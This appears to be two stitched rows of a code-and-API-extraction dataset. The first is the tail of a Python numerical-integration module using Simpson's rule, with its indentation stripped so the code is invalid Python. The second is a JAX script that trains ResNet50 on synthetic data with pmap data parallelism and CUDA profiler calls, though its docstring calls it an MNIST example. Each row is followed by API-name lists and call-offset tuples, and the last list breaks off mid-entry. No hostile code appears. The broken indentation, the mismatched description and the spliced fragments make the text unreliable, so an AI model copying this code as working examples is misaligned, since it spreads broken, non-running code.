fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
dx=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
fx=[];
                    for i in range(0, len(xl)):
fx.append(f(xl[i]));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
return res;
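# Hedged usage sketch (added for illustration, not part of the original module):
# `integrate` takes mpmath-style [a, b] limit lists, with 0 for the dimensions that
# are not integrated over, and a method name from `methods`.
def _integrate_usage_example():
    one_d = integrate(lambda x: x**2, [0, 1], 0, 0, "mp-gl");         # expect ~1/3
    two_d = integrate(lambda x, y: x*y, [0, 1], [0, 1], 0, "mp-gl");  # expect ~1/4
    return one_d, two_d;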
#benchmarking
def benchmark():
    f=lambda x: x**2; #1D test integrand (the original 3-argument lambda did not match the 1D limits passed below)
for m in methods:
t=time.time();
r=integrate(f, [0, 1], 0, 0, m);
print("Method: "+m+" Time: "+str(time.time()-t)+" Result: "+str(r));
if __name__=="__main__":
benchmark();
|
[
"numpy.meshgrid",
"numpy.abs",
"mpmath.mp.quad",
"scipy.integrate.quad",
"mpmath.fp.quad",
"numpy.ndim",
"scipy.integrate.tplquad",
"time.time",
"numpy.max",
"numpy.min",
"numpy.arange",
"scipy.integrate.dblquad",
"numpy.random.rand",
"scipy.integrate.simps"
] |
[((14219, 14230), 'time.time', 'time.time', ([], {}), '()\n', (14228, 14230), False, 'import time\n'), ((595, 648), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, limz, method='gauss-legendre')\n", (602, 648), False, 'from mpmath import mp\n'), ((711, 758), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, method='gauss-legendre')\n", (718, 758), False, 'from mpmath import mp\n'), ((801, 842), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx'], {'method': '"""gauss-legendre"""'}), "(f, limx, method='gauss-legendre')\n", (808, 842), False, 'from mpmath import mp\n'), ((909, 957), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, limz, method='tanh-sinh')\n", (916, 957), False, 'from mpmath import mp\n'), ((1020, 1062), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, method='tanh-sinh')\n", (1027, 1062), False, 'from mpmath import mp\n'), ((1105, 1141), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx'], {'method': '"""tanh-sinh"""'}), "(f, limx, method='tanh-sinh')\n", (1112, 1141), False, 'from mpmath import mp\n'), ((1208, 1261), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, limz, method='gauss-legendre')\n", (1215, 1261), False, 'from mpmath import fp\n'), ((1324, 1371), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, method='gauss-legendre')\n", (1331, 1371), False, 'from mpmath import fp\n'), ((1414, 1455), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx'], {'method': '"""gauss-legendre"""'}), "(f, limx, method='gauss-legendre')\n", (1421, 1455), False, 'from mpmath import fp\n'), ((1522, 1570), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, limz, method='tanh-sinh')\n", (1529, 1570), False, 'from mpmath import fp\n'), ((1633, 1675), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, method='tanh-sinh')\n", (1640, 1675), False, 'from mpmath import fp\n'), ((1718, 1754), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx'], {'method': '"""tanh-sinh"""'}), "(f, limx, method='tanh-sinh')\n", (1725, 1754), False, 'from mpmath import fp\n'), ((1823, 1893), 'scipy.integrate.tplquad', 'spint.tplquad', (['f', 'limz[0]', 'limz[1]', 'limy[0]', 'limy[1]', 'limx[0]', 'limx[1]'], {}), '(f, limz[0], limz[1], limy[0], limy[1], limx[0], limx[1])\n', (1836, 1893), True, 'import scipy.integrate as spint\n'), ((14314, 14325), 'time.time', 'time.time', ([], {}), '()\n', (14323, 14325), False, 'import time\n'), ((1959, 2011), 'scipy.integrate.dblquad', 'spint.dblquad', (['f', 'limy[0]', 'limy[1]', 'limx[0]', 'limx[1]'], {}), '(f, limy[0], limy[1], limx[0], limx[1])\n', (1972, 2011), True, 'import scipy.integrate as spint\n'), ((2057, 2088), 'scipy.integrate.quad', 'spint.quad', (['f', 'limx[0]', 'limx[1]'], {}), '(f, limx[0], limx[1])\n', (2067, 2088), True, 'import scipy.integrate as spint\n'), ((2137, 2150), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (2144, 2150), True, 'import numpy as np\n'), ((2221, 2234), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (2228, 2234), True, 'import numpy as np\n'), ((2305, 2318), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (2312, 2318), True, 'import numpy as np\n'), ((3101, 3114), 'numpy.ndim', 
'np.ndim', (['limx'], {}), '(limx)\n', (3108, 3114), True, 'import numpy as np\n'), ((3185, 3198), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (3192, 3198), True, 'import numpy as np\n'), ((3269, 3282), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (3276, 3282), True, 'import numpy as np\n'), ((3912, 3925), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (3919, 3925), True, 'import numpy as np\n'), ((3996, 4009), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (4003, 4009), True, 'import numpy as np\n'), ((4080, 4093), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (4087, 4093), True, 'import numpy as np\n'), ((4389, 4420), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (4398, 4420), True, 'import numpy as np\n'), ((4441, 4472), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (4450, 4472), True, 'import numpy as np\n'), ((4493, 4524), 'numpy.arange', 'np.arange', (['limz[0]', 'limz[1]', 'dz'], {}), '(limz[0], limz[1], dz)\n', (4502, 4524), True, 'import numpy as np\n'), ((4551, 4574), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl', 'zl'], {}), '(xl, yl, zl)\n', (4562, 4574), True, 'import numpy as np\n'), ((5006, 5028), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (5017, 5028), True, 'import scipy.integrate as spint\n'), ((7934, 7954), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y', 'z'], {}), '(x, y, z)\n', (7945, 7954), True, 'import numpy as np\n'), ((8330, 8342), 'numpy.max', 'np.max', (['fxyz'], {}), '(fxyz)\n', (8336, 8342), True, 'import numpy as np\n'), ((8361, 8373), 'numpy.min', 'np.min', (['fxyz'], {}), '(fxyz)\n', (8367, 8373), True, 'import numpy as np\n'), ((9197, 9214), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (9208, 9214), True, 'import numpy as np\n'), ((9471, 9482), 'numpy.max', 'np.max', (['fxy'], {}), '(fxy)\n', (9477, 9482), True, 'import numpy as np\n'), ((9505, 9516), 'numpy.min', 'np.min', (['fxy'], {}), '(fxy)\n', (9511, 9516), True, 'import numpy as np\n'), ((10217, 10227), 'numpy.max', 'np.max', (['fx'], {}), '(fx)\n', (10223, 10227), True, 'import numpy as np\n'), ((10250, 10260), 'numpy.min', 'np.min', (['fx'], {}), '(fx)\n', (10256, 10260), True, 'import numpy as np\n'), ((4961, 4983), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (4972, 4983), True, 'import scipy.integrate as spint\n'), ((5693, 5724), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (5702, 5724), True, 'import numpy as np\n'), ((5753, 5784), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (5762, 5784), True, 'import numpy as np\n'), ((5836, 5855), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl'], {}), '(xl, yl)\n', (5847, 5855), True, 'import numpy as np\n'), ((6183, 6205), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (6194, 6205), True, 'import scipy.integrate as spint\n'), ((6869, 6900), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (6878, 6900), True, 'import numpy as np\n'), ((7087, 7109), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (7098, 7109), True, 'import scipy.integrate as spint\n'), ((7752, 7769), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7766, 7769), True, 'import numpy as np\n'), ((7811, 7828), 'numpy.random.rand', 'np.random.rand', (['N'], {}), 
'(N)\n', (7825, 7828), True, 'import numpy as np\n'), ((7870, 7887), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7884, 7887), True, 'import numpy as np\n'), ((8390, 8413), 'numpy.random.rand', 'np.random.rand', (['N', 'N', 'N'], {}), '(N, N, N)\n', (8404, 8413), True, 'import numpy as np\n'), ((10937, 10968), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (10946, 10968), True, 'import numpy as np\n'), ((10989, 11020), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (10998, 11020), True, 'import numpy as np\n'), ((11041, 11072), 'numpy.arange', 'np.arange', (['limz[0]', 'limz[1]', 'dz'], {}), '(limz[0], limz[1], dz)\n', (11050, 11072), True, 'import numpy as np\n'), ((11099, 11122), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl', 'zl'], {}), '(xl, yl, zl)\n', (11110, 11122), True, 'import numpy as np\n'), ((11554, 11576), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (11565, 11576), True, 'import scipy.integrate as spint\n'), ((4906, 4928), 'scipy.integrate.simps', 'spint.simps', (['fz'], {'dx': 'dz'}), '(fz, dx=dz)\n', (4917, 4928), True, 'import scipy.integrate as spint\n'), ((5081, 5102), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (5087, 5102), True, 'import numpy as np\n'), ((9052, 9069), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (9066, 9069), True, 'import numpy as np\n'), ((9115, 9132), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (9129, 9132), True, 'import numpy as np\n'), ((9537, 9557), 'numpy.random.rand', 'np.random.rand', (['N', 'N'], {}), '(N, N)\n', (9551, 9557), True, 'import numpy as np\n'), ((10043, 10060), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (10057, 10060), True, 'import numpy as np\n'), ((10281, 10298), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (10295, 10298), True, 'import numpy as np\n'), ((6130, 6152), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (6141, 6152), True, 'import scipy.integrate as spint\n'), ((11509, 11531), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (11520, 11531), True, 'import scipy.integrate as spint\n'), ((12241, 12272), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (12250, 12272), True, 'import numpy as np\n'), ((12301, 12332), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (12310, 12332), True, 'import numpy as np\n'), ((12384, 12403), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl'], {}), '(xl, yl)\n', (12395, 12403), True, 'import numpy as np\n'), ((12731, 12753), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (12742, 12753), True, 'import scipy.integrate as spint\n'), ((13417, 13448), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (13426, 13448), True, 'import numpy as np\n'), ((13635, 13657), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (13646, 13657), True, 'import scipy.integrate as spint\n'), ((6274, 6295), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (6280, 6295), True, 'import numpy as np\n'), ((7178, 7199), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (7184, 7199), True, 'import numpy as np\n'), ((11454, 11476), 'scipy.integrate.simps', 'spint.simps', (['fz'], {'dx': 
'dz'}), '(fz, dx=dz)\n', (11465, 11476), True, 'import scipy.integrate as spint\n'), ((11629, 11650), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (11635, 11650), True, 'import numpy as np\n'), ((12678, 12700), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (12689, 12700), True, 'import scipy.integrate as spint\n'), ((12822, 12843), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (12828, 12843), True, 'import numpy as np\n'), ((13726, 13747), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (13732, 13747), True, 'import numpy as np\n')]
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An MNIST example with single-program multiple-data (SPMD) data parallelism.
The aim here is to illustrate how to use JAX's `pmap` to express and execute
SPMD programs for data parallelism along a batch dimension, while also
minimizing dependencies by avoiding the use of higher-level layers and
optimizers libraries.
"""
from functools import partial
import time
import numpy as np
import numpy.random as npr
from jax import jit, grad, pmap
from jax.scipy.special import logsumexp
from jax.lib import xla_bridge
from jax.tree_util import tree_map,tree_flatten,tree_unflatten
from jax import lax
import jax.numpy as jnp
import jax
from jax import jit, grad, random
from jax.experimental import optimizers
from jax.experimental import stax
from jax.experimental.stax import (AvgPool, BatchNorm, Conv, Dense, FanInSum,
FanOut, Flatten, GeneralConv, Identity,
MaxPool, Relu, LogSoftmax)
import ctypes
_cudart = ctypes.CDLL('libcudart.so')
def cu_prof_start():
ret = _cudart.cudaProfilerStart()
if ret != 0:
raise Exception('cudaProfilerStart() returned %d' % ret)
def cu_prof_stop():
ret = _cudart.cudaProfilerStop()
if ret != 0:
raise Exception('cudaProfilerStop() returned %d' % ret)
def ConvBlock(kernel_size, filters, strides=(2, 2)):
ks = kernel_size
filters1, filters2, filters3 = filters
Main = stax.serial(
Conv(filters1, (1, 1), strides), BatchNorm(), Relu,
Conv(filters2, (ks, ks), padding='SAME'), BatchNorm(), Relu,
Conv(filters3, (1, 1)), BatchNorm())
Shortcut = stax.serial(Conv(filters3, (1, 1), strides), BatchNorm())
return stax.serial(FanOut(2), stax.parallel(Main, Shortcut), FanInSum, Relu)
def IdentityBlock(kernel_size, filters):
ks = kernel_size
filters1, filters2 = filters
def make_main(input_shape):
# the number of output channels depends on the number of input channels
return stax.serial(
Conv(filters1, (1, 1)), BatchNorm(), Relu,
Conv(filters2, (ks, ks), padding='SAME'), BatchNorm(), Relu,
Conv(input_shape[3], (1, 1)), BatchNorm())
Main = stax.shape_dependent(make_main)
return stax.serial(FanOut(2), stax.parallel(Main, Identity), FanInSum, Relu)
# ResNet architectures compose layers and ResNet blocks
def ResNet50(num_classes):
return stax.serial(
GeneralConv(('HWCN', 'OIHW', 'NHWC'), 64, (7, 7), (2, 2), 'SAME'),
BatchNorm(), Relu, MaxPool((3, 3), strides=(2, 2)),
ConvBlock(3, [64, 64, 256], strides=(1, 1)),
IdentityBlock(3, [64, 64]),
IdentityBlock(3, [64, 64]),
ConvBlock(3, [128, 128, 512]),
IdentityBlock(3, [128, 128]),
IdentityBlock(3, [128, 128]),
IdentityBlock(3, [128, 128]),
ConvBlock(3, [256, 256, 1024]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
ConvBlock(3, [512, 512, 2048]),
IdentityBlock(3, [512, 512]),
IdentityBlock(3, [512, 512]),
AvgPool((7, 7)), Flatten, Dense(num_classes), LogSoftmax)
if __name__ == "__main__":
rng_key = random.PRNGKey(0)
batch_size = 64
num_classes = 1001
input_shape = (224, 224, 3, batch_size)
step_size = 0.1
num_steps = 10
init_fun, predict_fun = ResNet50(num_classes)
_, init_params = init_fun(rng_key, input_shape)
num_devices = xla_bridge.device_count()
def loss(params, batch):
inputs, targets = batch
logits = predict_fun(params, inputs)
return -jnp.sum(logits * targets)
def accuracy(params, batch):
inputs, targets = batch
target_class = jnp.argmax(targets, axis=-1)
predicted_class = jnp.argmax(predict_fun(params, inputs), axis=-1)
return jnp.mean(predicted_class == target_class)
def synth_batches():
rng = npr.RandomState(0)
while True:
images = rng.rand(*input_shape).astype('float32')
labels = rng.randint(num_classes, size=(batch_size, 1))
onehot_labels = labels == jnp.arange(num_classes)
batch_size_per_device, ragged = divmod(images.shape[-1], num_devices)
if ragged:
msg = "batch size must be divisible by device count, got {} and {}."
raise ValueError(msg.format(batch_size, num_devices))
shape_prefix = (num_devices, )
shape_postfix = (batch_size_per_device,)
images = images.reshape(shape_prefix + images.shape[:-1]+shape_postfix)
      onehot_labels = onehot_labels.reshape(shape_prefix + shape_postfix + onehot_labels.shape[-1:])
      yield images, onehot_labels
def ps_synth_batches():
rng = npr.RandomState(0)
while True:
images = rng.rand(*input_shape).astype('float32')
labels = rng.randint(num_classes, size=(batch_size, 1))
onehot_labels = labels == jnp.arange(num_classes)
yield images, onehot_labels
opt_init, opt_update, get_params = optimizers.momentum(step_size, mass=0.9)
batches = synth_batches()
ps_batches = ps_synth_batches()
@jit
def update(i, opt_state, batch):
params = get_params(opt_state)
return opt_update(i, grad(loss)(params, batch), opt_state)
@partial(pmap, axis_name='batch')
def allreduce_spmd_update( i,op_state, batch):
#params = tree_unflatten(treedef, params)
params = get_params(op_state)
grads = grad(loss)(params, batch)
leaves, local_treedef = tree_flatten(grads)
# We compute the total gradients, summing across the device-mapped axis,
# using the `lax.psum` SPMD primitive, which does a fast all-reduce-sum.
grads = [lax.psum(dw, 'batch') for dw in leaves]
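    # (illustration: with 2 devices, if device 0 holds dw = [1., 2.] and device 1
    #  holds dw = [3., 4.], lax.psum(dw, 'batch') returns [4., 6.] on both devices)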
grads = tree_unflatten(local_treedef, grads)
op_state = opt_update(i, grads, op_state)
return op_state
@partial(pmap, axis_name='batch')
def ps_spmd_update( params, batch):
grads = grad(loss)(params, batch)
return grads
@partial(jit, device=jax.devices()[0])
def ps_pre_process(op_state):
params = get_params(op_state)
replicated_op_params = tree_map(replicate_array, params)
return replicated_op_params
@partial(jit, device=jax.devices()[0])
def ps_post_process(grads,op_state,i):
grads = tree_map(lambda x: jnp.sum(x,axis=0), grads)
op_state = opt_update(i, grads, op_state)
return op_state
@jit
def ps_loop_process(op_state,k,batch_list):
grads = []
op_state = jax.device_put(op_state, jax.devices()[0])
for i in range(num_devices):
params = jax.device_put(get_params(op_state), jax.devices()[i])
_grad = jax.device_put(grad(loss)(params, batch_list[i]), jax.devices()[i])
_grad = jax.device_put(_grad, jax.devices()[0])
k = jax.device_put(k, jax.devices()[0])
op_state = opt_update(k, _grad, op_state)
return op_state
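  # prepend a device axis to every parameter array, so pmap sees one copy per device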
replicate_array = lambda x: jnp.broadcast_to(x, (num_devices,) + x.shape)
allreduce = True
if allreduce:
op_state = opt_init(init_params)
replicated_op_state = tree_map(replicate_array, op_state)
for i in range(num_steps):
#params, treedef = tree_flatten(params)
if i==3:
cu_prof_start()
new_batch = next(batches)
start_time = time.time()
replicated_op_state = allreduce_spmd_update( jnp.array([i]*num_devices),replicated_op_state, new_batch)
if i == 3:
cu_prof_stop()
end_time = time.time() - start_time
print("time:",end_time)
else:
op_state = jax.device_put(opt_init(init_params), jax.devices()[0])
'''
for i in range (num_steps):
new_batch = next(batches)
start_time = time.time()
replicated_op_params = ps_pre_process(op_state)
grads = ps_spmd_update(replicated_op_params,new_batch)
op_state = ps_post_process(grads,op_state,i)
end_time = time.time() - start_time
print("time:",end_time)
'''
for i in range (num_steps):
if i==3:
cu_prof_start()
batches_list = []
      for d in range(num_devices):
        batches_list.append(jax.device_put(next(ps_batches),jax.devices()[d]))
start_time = time.time()
op_state = ps_loop_process(op_state,i,batches_list)
end_time = time.time() - start_time
print("time:",end_time)
if i==3:
cu_prof_stop()
|
[
"jax.experimental.stax.BatchNorm",
"jax.experimental.stax.GeneralConv",
"jax.random.PRNGKey",
"jax.lax.psum",
"jax.tree_util.tree_unflatten",
"jax.tree_util.tree_map",
"jax.experimental.stax.parallel",
"jax.numpy.argmax",
"jax.experimental.stax.FanOut",
"numpy.random.RandomState",
"jax.experimental.optimizers.momentum",
"jax.experimental.stax.Dense",
"jax.experimental.stax.AvgPool",
"jax.experimental.stax.Conv",
"jax.experimental.stax.MaxPool",
"jax.tree_util.tree_flatten",
"jax.numpy.broadcast_to",
"jax.experimental.stax.shape_dependent",
"functools.partial",
"jax.numpy.sum",
"ctypes.CDLL",
"jax.numpy.array",
"jax.numpy.arange",
"time.time",
"jax.lib.xla_bridge.device_count",
"jax.grad",
"jax.numpy.mean",
"jax.devices"
] |
[((1615, 1642), 'ctypes.CDLL', 'ctypes.CDLL', (['"""libcudart.so"""'], {}), "('libcudart.so')\n", (1626, 1642), False, 'import ctypes\n'), ((2767, 2798), 'jax.experimental.stax.shape_dependent', 'stax.shape_dependent', (['make_main'], {}), '(make_main)\n', (2787, 2798), False, 'from jax.experimental import stax\n'), ((3813, 3830), 'jax.random.PRNGKey', 'random.PRNGKey', (['(0)'], {}), '(0)\n', (3827, 3830), False, 'from jax import jit, grad, random\n'), ((4064, 4089), 'jax.lib.xla_bridge.device_count', 'xla_bridge.device_count', ([], {}), '()\n', (4087, 4089), False, 'from jax.lib import xla_bridge\n'), ((5530, 5570), 'jax.experimental.optimizers.momentum', 'optimizers.momentum', (['step_size'], {'mass': '(0.9)'}), '(step_size, mass=0.9)\n', (5549, 5570), False, 'from jax.experimental import optimizers\n'), ((5778, 5810), 'functools.partial', 'partial', (['pmap'], {'axis_name': '"""batch"""'}), "(pmap, axis_name='batch')\n", (5785, 5810), False, 'from functools import partial\n'), ((6354, 6386), 'functools.partial', 'partial', (['pmap'], {'axis_name': '"""batch"""'}), "(pmap, axis_name='batch')\n", (6361, 6386), False, 'from functools import partial\n'), ((2052, 2083), 'jax.experimental.stax.Conv', 'Conv', (['filters1', '(1, 1)', 'strides'], {}), '(filters1, (1, 1), strides)\n', (2056, 2083), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2085, 2096), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2094, 2096), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2110, 2150), 'jax.experimental.stax.Conv', 'Conv', (['filters2', '(ks, ks)'], {'padding': '"""SAME"""'}), "(filters2, (ks, ks), padding='SAME')\n", (2114, 2150), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2152, 2163), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2161, 2163), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2177, 2199), 'jax.experimental.stax.Conv', 'Conv', (['filters3', '(1, 1)'], {}), '(filters3, (1, 1))\n', (2181, 2199), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2201, 2212), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2210, 2212), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2239, 2270), 'jax.experimental.stax.Conv', 'Conv', (['filters3', '(1, 1)', 'strides'], {}), '(filters3, (1, 1), strides)\n', (2243, 2270), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2272, 2283), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2281, 2283), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2306, 2315), 'jax.experimental.stax.FanOut', 'FanOut', (['(2)'], {}), '(2)\n', (2312, 2315), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, 
FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2317, 2346), 'jax.experimental.stax.parallel', 'stax.parallel', (['Main', 'Shortcut'], {}), '(Main, Shortcut)\n', (2330, 2346), False, 'from jax.experimental import stax\n'), ((2820, 2829), 'jax.experimental.stax.FanOut', 'FanOut', (['(2)'], {}), '(2)\n', (2826, 2829), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2831, 2860), 'jax.experimental.stax.parallel', 'stax.parallel', (['Main', 'Identity'], {}), '(Main, Identity)\n', (2844, 2860), False, 'from jax.experimental import stax\n'), ((2992, 3057), 'jax.experimental.stax.GeneralConv', 'GeneralConv', (["('HWCN', 'OIHW', 'NHWC')", '(64)', '(7, 7)', '(2, 2)', '"""SAME"""'], {}), "(('HWCN', 'OIHW', 'NHWC'), 64, (7, 7), (2, 2), 'SAME')\n", (3003, 3057), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3065, 3076), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (3074, 3076), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3084, 3115), 'jax.experimental.stax.MaxPool', 'MaxPool', (['(3, 3)'], {'strides': '(2, 2)'}), '((3, 3), strides=(2, 2))\n', (3091, 3115), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3715, 3730), 'jax.experimental.stax.AvgPool', 'AvgPool', (['(7, 7)'], {}), '((7, 7))\n', (3722, 3730), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3741, 3759), 'jax.experimental.stax.Dense', 'Dense', (['num_classes'], {}), '(num_classes)\n', (3746, 3759), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((4305, 4333), 'jax.numpy.argmax', 'jnp.argmax', (['targets'], {'axis': '(-1)'}), '(targets, axis=-1)\n', (4315, 4333), True, 'import jax.numpy as jnp\n'), ((4416, 4457), 'jax.numpy.mean', 'jnp.mean', (['(predicted_class == target_class)'], {}), '(predicted_class == target_class)\n', (4424, 4457), True, 'import jax.numpy as jnp\n'), ((4492, 4510), 'numpy.random.RandomState', 'npr.RandomState', (['(0)'], {}), '(0)\n', (4507, 4510), True, 'import numpy.random as npr\n'), ((5249, 5267), 'numpy.random.RandomState', 'npr.RandomState', (['(0)'], {}), '(0)\n', (5264, 5267), True, 'import numpy.random as npr\n'), ((6007, 6026), 'jax.tree_util.tree_flatten', 'tree_flatten', 